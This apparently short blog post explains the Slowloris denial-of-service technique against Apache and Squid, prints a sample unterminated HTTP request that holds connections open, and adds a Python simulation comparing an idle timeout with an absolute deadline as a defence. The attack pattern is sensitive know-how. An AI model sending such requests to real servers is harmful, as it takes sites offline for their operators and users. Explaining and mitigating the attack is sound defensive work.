Today's Apache/Squid DoS tool

Seen on reddit; the original article is on ha.ckers.org (slowloris.pl download). The basic principle is:

It basically uses a concept of keeping an HTTP session alive indefinitely (or as long as possible) and repeating that process a few hundred times

The packets it sends look like this:

GET / HTTP/1.1\r\n
Host: host\r\n
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.503l3; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; MSOffice 12)\r\n
Content-Length: 42\r\n
X-a: b\r\n

It can also target … Note that there is no \r\n\r\n here to terminate the HTTP headers, so poor Apache/Squid just keeps waiting and waiting.

This method also seems to be fairly old.

Apache 1.x and 2.x are affected, as well as Squid. Microsoft IIS 6.0 or 7.0 and lighttpd are not affected.
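
The server's side of the stall described above, as an added example (not code from the original post or from slowloris.pl): the unterminated request head is fed into an in-memory asyncio reader, and a per-read idle timeout is compared with one absolute deadline for the whole header block. The function names, the timeout values and the repeated X-a: b lines are assumptions made for the illustration.

```python
import asyncio

HEADER_END = b"\r\n\r\n"
# Constructed sample: the unterminated head from the post (User-Agent omitted).
PARTIAL = b"GET / HTTP/1.1\r\nHost: host\r\nContent-Length: 42\r\n"
DRIP = b"X-a: b\r\n"  # constructed: one more header line, still no terminator

async def read_head_idle(reader, idle_timeout):
    """Weak: the timer restarts whenever any bytes arrive."""
    buf = b""
    while HEADER_END not in buf:
        try:
            chunk = await asyncio.wait_for(reader.read(1024), idle_timeout)
        except asyncio.TimeoutError:
            return "idle_timeout", buf
        if not chunk:
            return "closed", buf
        buf += chunk
    return "ok", buf

async def read_head_deadline(reader, deadline):
    """Hardened: one absolute deadline for the whole header block."""
    try:
        return "ok", await asyncio.wait_for(reader.readuntil(HEADER_END), deadline)
    except asyncio.TimeoutError:
        return "deadline", b""
    except asyncio.LimitOverrunError:
        return "too_large", b""  # head exceeded the reader's byte limit
    except asyncio.IncompleteReadError as exc:
        return "closed", exc.partial

async def _simulate(read_head, timeout, chunks, gap):
    reader = asyncio.StreamReader(limit=8192)  # in-memory, no sockets

    async def peer():
        for chunk in chunks:
            reader.feed_data(chunk)
            await asyncio.sleep(gap)

    task = asyncio.create_task(peer())
    loop = asyncio.get_running_loop()
    start = loop.time()
    status, _ = await read_head(reader, timeout)
    task.cancel()
    return status, loop.time() - start  # seconds the connection slot was held

def run(read_head, timeout, chunks, gap=0.05):
    return asyncio.run(_simulate(read_head, timeout, chunks, gap))
```

With lines arriving every 0.05 s, the 0.2 s idle timer only fires once the peer goes quiet, while the 0.2 s absolute deadline frees the slot no matter how often another header line arrives.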
